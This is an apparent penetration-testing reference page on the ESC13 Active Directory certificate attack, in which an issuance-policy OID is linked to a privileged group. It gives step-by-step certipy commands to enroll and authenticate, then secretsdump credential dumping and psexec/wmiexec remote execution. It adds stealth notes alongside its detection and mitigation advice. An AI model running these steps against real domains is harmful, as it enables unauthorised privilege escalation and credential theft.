esc13-issuance-policy-oid-group-link.md (9479B)
1 --- 2 title: "ESC13 — Issuance Policy OID Group Link" 3 description: "ESC13 is fundamentally different from every other ESC attack. Where ESC1–ESC12 focus on impersonating a specific user, ESC13 achieves privilege escalation…" 4 category: active-directory 5 subcategory: "ADCS & Certificates" 6 tags: ["active-directory", "adcs", "privilege-escalation"] 7 tools: ["Impacket", "Certipy", "BloodHound", "ldapsearch", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/ACL-ESC-Techniques/ESC13 — Issuance Policy OID Group Link.md" 11 --- 12 # ESC13 — Issuance Policy OID Group Link 13 14 ## Quick Reference 15 16 | Field | Value | 17 |-------|-------| 18 | **Category** | Issuance Policy / Group Membership Escalation | 19 | **Difficulty** | Medium | 20 | **Pre-requisites** | Enrollment rights on a template with linked issuance policy OID | 21 | **Tools** | Certipy, BloodHound, PowerView | 22 | **OPSEC Noise** | Low — uses legitimate enrollment, no attribute manipulation | 23 | **One-liner** | Enroll in a template whose issuance policy OID is linked to a privileged AD group via `ms-DS-OIDToGroup-Link`, granting effective group membership upon certificate authentication. | 24 25 *** 26 27 ## What Is ESC13? 28 29 ESC13 is fundamentally different from every other ESC attack. Where ESC1–ESC12 focus on **impersonating a specific user**, ESC13 achieves privilege escalation by **gaining effective membership in a privileged group** — without any AD account attribute modification, without UPN swapping, and without SAN injection. 30 31 The mechanism exploits Microsoft's **Authentication Mechanism Assurance (AMA)** feature. AMA allows organisations to map an Issuance Policy OID in a certificate to an AD security group via the `ms-DS-OIDToGroup-Link` attribute. When a user authenticates with a certificate that has this policy, the KDC adds the linked group's SID to the user's Privilege Attribute Certificate (PAC) — effectively granting them membership in that group for the duration of the session. 32 33 The abuse: if a low-privileged user can **enroll** in a template that includes an issuance policy linked to a privileged group (like Domain Admins or a custom admin group), they receive that group's privileges upon certificate-based authentication. 34 35 *** 36 37 ## The Mechanism 38 39 ``` 40 Normal AMA flow (intended): 41 Template has Issuance Policy → OID "1.2.3.4.5.6" 42 OID "1.2.3.4.5.6" linked via ms-DS-OIDToGroup-Link → "PKI-Admins" group 43 User enrolls → Cert has Issuance Policy "1.2.3.4.5.6" 44 User authenticates → KDC adds "PKI-Admins" SID to PAC 45 Result: User has PKI-Admins privileges for this session 46 47 ESC13 abuse: 48 Same flow — but enrollment rights are overly permissive 49 Low-priv user enrolls in the template 50 Gets effective group membership in a privileged group 51 = Privilege escalation without modifying any AD object 52 ``` 53 54 *** 55 56 ## Required Conditions 57 58 | Condition | Notes | 59 |-----------|-------| 60 | Template has an **Issuance Policy** configured | Check template's `msPKI-Certificate-Policy` attribute | 61 | The Issuance Policy OID has **`ms-DS-OIDToGroup-Link`** set | Links to a security group | 62 | The linked group is **privileged** | Domain Admins, custom admin groups, etc. | 63 | Low-priv users can **enroll** | `Enrollment Rights: Domain Users` | 64 | Manager Approval is off | `Requires Manager Approval: False` | 65 | No authorized signatures required | `Authorized Signatures Required: 0` | 66 | Template has **Client Authentication EKU** | For domain authentication | 67 68 *** 69 70 ## Step 0 — Enumeration 71 72 ```bash 73 # Standard certipy scan 74 certipy-ad find -u 'lowpriv@domain.htb' -p 'Password123!' \ 75 -dc-ip $TARGET -vulnerable -stdout 76 77 # Look for ESC13 in output — certipy flags it when it detects OID group links 78 ``` 79 80 ### What Vulnerable ESC13 Output Looks Like 81 82 ``` 83 Certificate Templates 84 Template Name : LinkedPolicyTemplate 85 Enabled : True 86 Client Authentication : True 87 Enrollee Supplies Subject : False 88 Requires Manager Approval : False 89 Authorized Signatures Required : 0 90 Certificate Policies : 1.2.3.4.5.6.7.8 ← Issuance Policy OID 91 Permissions 92 Enrollment Rights : DOMAIN\Domain Users 93 94 [!] Vulnerabilities 95 ESC13 : Certificate template has an issuance policy OID linked 96 to a group via ms-DS-OIDToGroup-Link 97 OID Group Link : DOMAIN\PrivilegedGroup 98 ``` 99 100 ### Manual Enumeration of OID Group Links 101 102 ```powershell 103 # PowerShell — find all OID objects with group links 104 Get-ADObject -SearchBase "CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=htb" \ 105 -Filter {msPKI-Cert-Template-OID -like '*'} \ 106 -Properties 'ms-DS-OIDToGroup-Link','msPKI-Cert-Template-OID','DisplayName' | 107 Where-Object { $_.'ms-DS-OIDToGroup-Link' -ne $null } | 108 Select-Object DisplayName, 'msPKI-Cert-Template-OID', 'ms-DS-OIDToGroup-Link' 109 110 # Output shows which OIDs are linked to which groups 111 ``` 112 113 ```bash 114 # From Linux via LDAP 115 ldapsearch -x -H ldap://$TARGET -D 'lowpriv@domain.htb' -w 'Password123!' \ 116 -b "CN=OID,CN=Public Key Services,CN=Services,CN=Configuration,DC=domain,DC=htb" \ 117 '(msDS-OIDToGroupLink=*)' dn msDS-OIDToGroupLink msPKI-Cert-Template-OID 118 ``` 119 120 *** 121 122 ## Full Attack Chain — Linux (Certipy) 123 124 ### Step 1 — Request Certificate from the Linked Template 125 126 ```bash 127 certipy-ad req \ 128 -u 'lowpriv@domain.htb' \ 129 -p 'Password123!' \ 130 -dc-ip $TARGET \ 131 -ca 'DOMAIN-CA-NAME' \ 132 -template 'LinkedPolicyTemplate' 133 134 # Output: lowpriv.pfx 135 # This cert contains the Issuance Policy OID that is linked to the privileged group 136 ``` 137 138 ### Step 2 — Authenticate with the Certificate 139 140 ```bash 141 certipy-ad auth \ 142 -pfx lowpriv.pfx \ 143 -username lowpriv \ 144 -domain domain.htb \ 145 -dc-ip $TARGET 146 147 # The KDC adds the linked group's SID to your PAC 148 # You now effectively have that group's privileges 149 ``` 150 151 ### Step 3 — Use Elevated Privileges 152 153 ```bash 154 export KRB5CCNAME=lowpriv.ccache 155 156 # If the linked group has DCSync rights: 157 secretsdump.py -k -no-pass DC01.domain.htb 158 159 # If the linked group has admin access: 160 wmiexec.py -k -no-pass DC01.domain.htb 161 psexec.py -k -no-pass DC01.domain.htb 162 ``` 163 164 > 💡 Your TGT has the privileged group's SID in the PAC. Any service that checks group membership via the PAC will grant you access. You don't need to pass-the-hash or impersonate another user — **you ARE still lowpriv, but with extra group memberships**. 165 166 *** 167 168 ## ESC13 Visual Attack Flow 169 170 ``` 171 [lowpriv@domain.htb] 172 │ 173 │ certipy req -template LinkedPolicyTemplate 174 ▼ 175 [lowpriv.pfx] ← Contains Issuance Policy OID 1.2.3.4.5.6 176 │ 177 │ certipy auth -pfx lowpriv.pfx 178 ▼ 179 [KDC processes cert → sees OID → looks up ms-DS-OIDToGroup-Link] 180 │ 181 │ KDC adds PrivilegedGroup SID to PAC 182 ▼ 183 [TGT for lowpriv WITH PrivilegedGroup membership] 184 │ 185 ▼ 186 [PRIVILEGE ESCALATION — access controlled by group membership] 187 ``` 188 189 *** 190 191 ## ESC13 vs All Other ESCs 192 193 | | ESC1–12 / ESC15–17 | **ESC13** | 194 |---|---|---| 195 | **What you get** | Identity of another user | **Group membership for yourself** | 196 | **UPN change required** | Usually yes | ❌ No | 197 | **SAN injection required** | Often yes | ❌ No | 198 | **Account manipulation** | Often yes | ❌ No | 199 | **Your identity changes** | ✅ You become someone else | ❌ **You stay YOU — just with extra groups** | 200 | **Mechanism** | Certificate identity spoofing | **PAC group SID injection via AMA** | 201 | **Stealth** | Varies | 🟢 **Very stealthy — legitimate enrollment** | 202 203 *** 204 205 ## OPSEC Considerations 206 207 | Action | Log Generated | Noise Level | 208 |--------|--------------|-------------| 209 | Certificate request | Event ID 4886/4887 | 🟢 Low (looks like normal enrollment) | 210 | Certificate auth | Event ID 4768 (TGT request) | 🟢 Low (normal PKINIT) | 211 | Privileged action with TGT | Depends on what you do | 🟡 Medium | 212 213 > 💡 ESC13 is one of the **stealthiest** ESC attacks because it uses completely legitimate enrollment functionality. No AD attributes are modified, no accounts are impersonated — you simply enroll in a template you're allowed to use. The only anomaly is a low-priv user suddenly having privileged access. 214 215 *** 216 217 ## Detection Indicators 218 219 - **Event ID 4887** — Certificate issued from a template that has an issuance policy linked to a privileged group — cross-reference requester's actual group memberships 220 - **PAC analysis** — TGTs containing group SIDs that don't match the user's actual AD group memberships 221 - **BloodHound** — Edges from low-priv principals to templates with linked OID groups 222 - **Audit `ms-DS-OIDToGroup-Link`** — Any OID object with this attribute pointing to a privileged group should be treated as a Tier 0 configuration 223 224 *** 225 226 ## Mitigation 227 228 - **Restrict enrollment rights** on templates with linked issuance policies — these should only be enrollable by the intended audience (e.g., Tier 0 admins) 229 - **Audit all `ms-DS-OIDToGroup-Link` attributes** — verify that every linked group is intentionally exposed to certificate-based membership 230 - **Avoid linking OIDs to highly privileged groups** — Domain Admins, Enterprise Admins, Schema Admins should never be linked to issuance policies 231 - **Monitor certificate enrollment** for templates with issuance policies — alert on enrollment by users not in the intended group 232 - **Remove unused issuance policies** — if the AMA feature isn't actively used, remove all OID group links